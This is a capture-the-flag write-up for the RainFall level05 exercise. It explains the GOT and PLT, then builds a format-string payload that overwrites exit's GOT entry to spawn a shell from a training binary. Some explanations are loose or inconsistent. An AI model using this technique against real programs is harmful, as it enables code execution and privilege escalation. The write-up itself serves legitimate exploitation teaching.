Welcome to RainFall

🌊 Level05 of Rainfall Project (Overwrite the GOT with format string) 🌊
🔍 Introduction
Hello, today I’m gonna show you the level 5 of the rainfall project from 42 school.
🔍 Quick view of the binary
To begin with, we’ll run the file command to determine the file type and format.
So you can run the following command
1 | $ file ./level05 |
normally, you should get a output like this
1 | level5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fb3518ed7ddb097b6f8a23a49fad17a792ae35d8, not stripped |
We can see that this is an ELF 32-bit binary with x86 architecture (Intel 80386).
We can also see that the binary is dynamically linked and that the interpreter is located in /lib/ld-linux.so.2, and that the code has been compiled under Linux with kernel 2.6.24.
We can use the readelf command to retrieve a little more information about the binary.
1 | readelf -h ./level5 |
1 | En-tête ELF: |
You should see something like this.
Now, let’s take a deeper dive into the binary. We can use tools such as objdump or nm to list the available symbols. Additionally, we can run strings to extract readable text from the binary.
For my part, I’ll go straight to debugging by opening it in gdb with the GEF extension.
1 | gdb ./level5 |
A binary consists of different sections that work together to ensure its functionality. This becomes even more interesting when the binary is dynamically linked, as ours is.
I’ll revisit this point later.
If you run the following command in gdb:
1 | info file |
You Should have something like this
1 | Symbols from "/home/sam0verfl0w/repos/RainFall/level5/Ressources/level5". |
✨ Quick view of ELF (Executable Linkable Format) file format
As you can see, we can view the different sections of the binary.
For example, the .text section contains the processor opcodes that the CPU will execute.
We also have other sections, such as:
- .rodata – Contains strings or data that are accessible in read-only mode.
- .bss – Stores variables that were not initialized at compile time.
Additionally, there are sections responsible for loading and launching the binary into memory, such as:
- .interp, .dynamic, .dynsym, .dynstr
- .plt, .got, .rel.dyn, .rel.plt, .got.plt
I’ll go into more detail about these later.
For now, let’s disassemble the binary and analyze how the program works.
If you run the following command in gdb:
1 | info functions |
1 | All defined functions: |
if we disassemble the main function with this command
1 | disas main |
You should have something like this
1 | Dump of assembler code for function main: |
We notice that our main function makes a call to the function n.
If we disassemble it, we can analyze its behavior.
1 | disas n |
1 | Dump of assembler code for function n: |
We notice several things in this code.
The first important detail I forgot to mention is that in 32-bit architecture, the calling convention relies on the stack, which operates in LIFO (Last In, First Out) order. This means that the last value pushed onto the stack will be the first one to be popped.
On x86_64 architectures, however, the standard calling convention typically uses register passing instead of the stack.
You can explore the different calling conventions in more detail here:
🔗 x86 Calling Conventions
Identify the vulnerability
1 | 0x080484c2 <+0>: push ebp |
If we go back to this piece of code, we can see that after the function prologue, a small amount of space is allocated on the stack—specifically 0x218 in hexadecimal (536 bytes).
We also notice a call to the fgets function.
After executing sub rsp, 0x218, the processor loads a value from a specific address in the data segment (ds).
If we use the following command in gdb:
1 | x/x <address_from_data_segment> |
We can observe the value stored at that address.
1 | 0x8049848 <stdin@@GLIBC_2.0>: 0x00000000 |
Remember 0 is STDIN, 1 is STDOUT, 2 is STDERR
We can see that this address points to libc’s stdin symbol, which serves as the last parameter of our fgets function. This value will be loaded onto the stack at the last position, [esp+0x8].
🧪 Understanding the fgets Call
Without even running the program, we now know that fgets takes user input—pretty cool!
If we continue analyzing the code, we notice that:
- At
esp+0x4, the program requests 0x200 bytes (512 bytes in decimal) to be read. - The instruction
lea(Load Effective Address) retrieves the address stored atebp - 0x208, which is the starting address of our buffer. - This buffer is then placed at the top of the stack, completing the setup for the
fgetsfunction call.
☣️ The Developer’s Critical Mistake
What follows is a disaster—the developer has made a serious vulnerability!
- The return value of
fgetsis stored in theeaxregister, meaningeaxholds a pointer to our input buffer. - The problem? This buffer is passed directly to
printfwithout specifying a format string! - The function then ends with a call to
exit(1), terminating the program via a system exit call.
😎 Exploiting the Vulnerability
If you haven’t figured it out yet, this vulnerability is known as a format string vulnerability.
This means we can manipulate memory by crafting specific inputs.
Let’s put it to the test!
If you run the program and enter %x as input, you’ll notice that we can read values directly from the stack.
Even though we understand the potential of this vulnerability, we still need to figure out how to exploit it effectively.
To do that, let’s go back to our list of functions—there’s still one function we haven’t explored yet.
If we disassemble o function ?
1 | 0x080484a4 <+0>: push ebp |
We see that this function calls the system function with a string as an argument.
If we run the following command in gdb:
1 | gef➤ x/s 0x80485f0 |
💡 Exploiting the Format String Vulnerability
Great! We now know that the o function executes a shell.
However, this function is never called in the normal execution flow—so how can we force the program to call it using our format string vulnerability?
At this point, we could run checksec to analyze the binary’s protections, but that won’t help much.
We could also use nm to inspect symbols and variables, but we’ve already determined that there are no global variables being checked or executed.
💡 Enter GOT and PLT
This is where we introduce **GOT (Global Offset Table) and PLT (Procedure Linkage Table)**—key concepts for dynamically linked binaries.
GOT (Global Offset Table):
A table containing addresses of functions resolved at runtime, allowing dynamically linked libraries (likelibc) to be used efficiently.PLT (Procedure Linkage Table):
A mechanism used to indirectly call functions in shared libraries. When a function is called for the first time, PLT redirects it to the GOT for resolution.
Understanding how these work will allow us to redirect execution and exploit our format string vulnerability to force the execution of o(), giving us a shell.
💡 Understanding GOT and PLT
GOT (Global Offset Table)
The Global Offset Table (GOT) is a section in an ELF binary that helps resolve memory addresses dynamically at runtime.
It is crucial for Position Independent Code (PIC) and Position Independent Executables (PIE), which are designed to be loaded at different memory addresses each time the program runs.
- Since the absolute memory addresses of variables and functions are unknown before execution, the GOT helps map symbols to their corresponding memory addresses at runtime.
- This allows shared libraries (
.sofiles) to be loaded at arbitrary addresses, avoiding conflicts with the main program or other libraries. - The GOT is represented in the
.gotand.got.pltsections of an ELF file. - The dynamic linker updates GOT entries at program startup or when specific symbols are accessed.
- This mechanism also provides security benefits, making it harder for attackers to exploit hardcoded addresses in binaries.
PLT (Procedure Linkage Table)
While the GOT resolves data symbols, the Procedure Linkage Table (PLT) is responsible for resolving function calls.
- Since the linker cannot resolve function calls between different dynamically linked objects at compile time, it sets up a PLT entry for each external function.
- The first time a function is called, execution is redirected through the PLT, which then resolves the function’s actual address via the GOT.
- This enables position-independent function calls without compromising binary portability or shareability.
- Both executables and shared libraries have their own PLT sections to manage this process.
Understanding GOT and PLT will be key to redirecting execution flow and exploiting format string vulnerabilities in dynamically linked binaries.
1 | $ objdump -d level5 -M intel -j .plt |
you should have something like this
1 | level5: format de fichier elf32-i386 |
Understanding PLT Stubs and Function Resolution in a Dynamically Linked Binary
Each symbol in the Procedure Linkage Table (PLT), like mysymbol@PLT, corresponds to a PLT stub.
A stub is a small executable code snippet that serves as an intermediary for dynamic function calls.
PLT Stub Characteristics
- Each PLT stub is aligned to 16 bytes for optimization and predictability.
- The .plt section contains all function stubs for dynamically linked functions.
Execution Flow in a Dynamically Linked Binary
- When the binary starts, execution begins at the
_startsymbol. _startcallslibc_start_main, which in turn calls themainfunction.- Inside
main, when a function likeputsis called, the CPU jumps to the corresponding PLT stub. - The PLT stub then:
- Looks for the function address in the Global Offset Table (GOT).
- If the function is already resolved, it jumps directly to it (e.g.,
putsin libc). - If not, the stub pushes the GOT entry onto the stack and calls the dynamic linker to resolve it.
- The dynamic linker finds the correct function, writes its address to the GOT, and execution continues.
Example with a Simple Binary
To analyze this, we can compile a basic dynamically linked binary and disassemble its PLT and GOT using tools like objdump and readelf.
1 | // gcc example.c -o example -m32 -fno-stack-protector -no-pie -z execstack |
we’re going to compile this program in 32 bits to respect the same calling convention etc… and understand how got and plt work with what I said above.
we’ll open our binary with gdb GEF or peda as you like, then place a breakpoint at the main function’s input.
We can also put a breakpoint before puts calls.
once launched, we can do a first continue in order to arrive before puts call.
1 | run |
once here, we can run the GOT command, which will allow us to see the puts address in our GOT
1 | got |
you should have something like this.
1 | gef➤ got |
So you can see that we’ve found our puts, but if we look at where it’s pointing, you’ll notice that it’s not the actual symbol of the puts function.
If we examine the GOT entry for puts, we can verify this behavior:
1 | x/gx &puts |
You’ll notice that this address redirects us to the PLT section instead of the actual puts function. But why?
The reason is simple: the puts symbol hasn’t yet been resolved for the first time. The PLT acts as an intermediary to handle function resolution dynamically.
Investigating the Resolution Process
To observe this in action, we can disassemble the GOT entry:
1 | x/i *(puts@got) |
This will show that the GOT entry initially points to the corresponding PLT stub. Now, let’s step into the call and see how it works:
1 | b *puts@plt |
By stepping through the instructions, we’ll see that:
- The call jumps to the PLT stub.
- If the function hasn’t been resolved, the stub triggers a dynamic linker call.
- The linker resolves the actual address of
putsin the shared library (libc). - The resolved address is written to the GOT, so future calls bypass the PLT stub.
Once the function has been resolved, subsequent calls to puts will directly use the resolved address in the GOT, avoiding additional linker overhead.
Now that we understand how PLT and GOT work, we can leverage this knowledge for exploitation techniques such as function hijacking or ret2plt attacks! 🚀
1 | si |
1 | 0x8049040 <puts@plt+0> jmp DWORD PTR ds:0x804c004 |
The first line you see is the location in the got of the PLT symbol if we do an x/x there, we find the following line because, as I explained earlier, the function hasn’t yet been resolved.
1 | gef➤ x/x 0x804c004 |
Stepping Through the PLT Resolution
As you can see, the address pointed to by the data segment is 0x804c004.
This address corresponds to the following entry in the GOT.
To observe how the PLT resolves function calls, we can step through the execution.
1 | ni |
This will execute the next instruction and allow the PLT to do its work. As the execution progresses, we will see how the dynamic linker finds the real address of the function and updates the GOT entry accordingly.
By stepping through carefully, we can analyze:
- The transition from the PLT stub to the dynamic linker.
- The moment when the actual function address is resolved.
- How subsequent calls to the function skip the PLT and use the resolved address directly from the GOT.
This understanding is crucial for analyzing binary exploitation techniques, such as GOT overwrite attacks or ret2plt exploits. 🚀
Once this is done, you can see that we’re pushing an integer into each stub here it’s 8 this entry corresponds to the index in the GOT of the puts function.
then the cpu will simply push this argument onto the stack, since in 32-bit x86 the argument is passed via the stack.
so we are once again executing a ni.
1 | ni |
as you can see, our 8 is now at the top of our stack the next instruction is a jump, but where to? we’ll see right away.
if we x/i the address we’re going to jump to, we can see that it’s the entry to the plt section
1 | 0x8049020 push DWORD PTR ds:0x804bff8 |
Dynamic Linker Resolution
The place where we jump to 0x804bffc is the dynamic linker entry point.
Once inside the dynamic linker function, it will:
- Load the
libcif it hasn’t been loaded yet. - Locate the corresponding
putssymbol. - Write the resolved address to the GOT.
Without delving into the specifics of how the linker works (which will be covered in another tutorial), we finally land at the actual puts function:
1 | 0xf7c74c80 <puts+0> endbr32 |
At this point, if we check the GOT, we can see that the linker has updated it. The address of the puts symbol has now been resolved:
1 | gef➤ got |
If we take this new address and examine its context, we can analyze the resolution process further. 🚀
1 | gef➤ fa 0xf7c74c80 |
Function Resolution in libc
We can see that the function is now correctly resolved, and it is present in libc.
Super! 🎉 Now that we understand how the PLT and GOT work, let’s take it a step further.
If we progress further in the program and call this function again later, what happens? 🤔
Continuing Execution and Function Resolution in libc
We continue execution with:
1 | c |
We’ve stopped once again at the next puts call, which will simply execute puts("world");.
Let’s step into the instruction like before and observe how the PLT behaves:
1 | si |
1 | 0x8049040 <puts@plt+0> jmp DWORD PTR ds:0x804c004 |
We still see our usual PLT stub. However, if we check the GOT address, as observed earlier, it directly jumps to libc‘s puts function since it has already been resolved once during the program’s execution.
1 | gef➤ x/x 0x804c004 |
Since the function address is now stored in the GOT, execution directly transfers to libc‘s puts function without passing through the PLT again.
1 | gef➤ x/i 0xf7c74c80 |
Now, puts is fully resolved and directly accessed from libc. 🚀
Overwriting the GOT to Gain Control
Now that we understand how GOT and PLT work, we can leverage a format string vulnerability to overwrite the GOT entry of a function and redirect execution to our shell-spawning function.
Inspecting the GOT
Let’s return to our Level 5 binary, set a breakpoint on main, and inspect the GOT:
1 | gef➤ got |
Since there’s no RelRO protection, the GOT is writable, making it possible to overwrite function pointers.
RelRO: Protection to make a GOT section in read-only.
🚀 Next, we will craft an exploit using a format string vulnerability to modify a GOT entry and redirect execution to a function that executes a shell.
Understanding the Initial State of the GOT
At the beginning of program execution, you should observe something like this:
- No function or symbol (except for
__libc_start_main) has been resolved yet. - This is because functions are only resolved once they are called at least once.
__libc_start_mainis an exception since it is invoked from the_startsymbol during program initialization.
Choosing a Target for GOT Overwrite
To overwrite a GOT entry, we need to select a suitable function.
However, we cannot target fgets because we still need it for input handling.
🤔 So, what can we do?
If we analyze the function calls in the binary, we might find a candidate that allows us to gain control—perhaps a function like exit or another suitable stub.
🛠️ Next step: Let’s reassemble and inspect function calls (call instructions) to determine a viable target for GOT overwrite.
Disassembling Function n
To analyze potential targets for GOT overwrite, let’s disassemble the function n:
1 | gef➤ disassemble n |
Observations
ncalls three functions:fgets@pltat0x080484e5printf@pltat0x080484f3exit@pltat0x080484ff
The function
exit@plt(0x080483d0) is a good candidate for GOT overwrite.By replacing
exitwithsystem, we can make the program execute an arbitrary command when it callsexit().
Next Steps
We’ll attempt to overwrite exit@got.plt with the address of system to gain execution control. 🚀
1 | ❯ ./level5 |
Great! now that we know where our buffer is on the stack, all we have to do is replace the A’s with a valid address - you’ve got it right, the address of the exit symbol’s entry in the got and we’re going to rewrite it at the location pointed to by the exit symbol, which will enable us to change the exit address in the got
if we do an objdump and retrieve the address of the got in the PLT exit@PLT stub, you should have this address if the binary is dynamically linked but not PIE, so you should have the same addresses.
1 | objdump -d ./level5 -M intel -j .plt |
as you can see, our address is the one present in the data segment at 0x8049838.
So we can now rewrite, I’m going to create a payload first with python3 and finish with a little pwntools script so I can pwn it directly.
so first here’s my payload,
all we have to do is write the address of the exit entry in the got in little endian,
as memory is in little endian on x86 and x86-64 cpu architectures.
1 | $ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b'%4\$p')" | ./level5 |
In little endian, the following address 0x8049838 gives \x38\x98\x04\x08
so now we can write our payload and check if what we say is true, right?
1 | $ python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%4\$p')" | ./level5 |
if we run our payload on our binary normally if everything has worked correctly you should have this
1 | ❯ python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%4\$p')" | ./level5 |
so you can see that our address is correctly written in the order we want.
In the final step, we simply replace the %p by a %n, which allows us to rewrite to the address we’ve set on the stack.
the address of the o function is 0x080484a4 so we’ll have to write 0x080484a4 - 4 bytes in number of characters to be able to jump to our o function when exit@PLT is called.
The final payload is here
1 | (python3 -c "import sys; sys.stdout.buffer.write(b'\x38\x98\x04\x08' + b'%33788c%4\$hn%164c%4\$hhn')";/bin/cat) | ./level5 |
we first write 0x84 using the hn option the hn option writes on 2 bytes then we finish with the other part of the address we’re missing: 0xa4 we write but this time with the hn option which writes on the least significant byte and we add a cat just after to preserve the shell state so we can execute our commands.
Super you got your shell to rewrite the address of the got of exit every time the function is called it will execute the one you rewrote which means that exit can never be resolved.
I provide you with a script written with pwntools to facilitate your task pwntools allows you to quickly pwn programs etc..
1 | #!/usr/bin/python3 |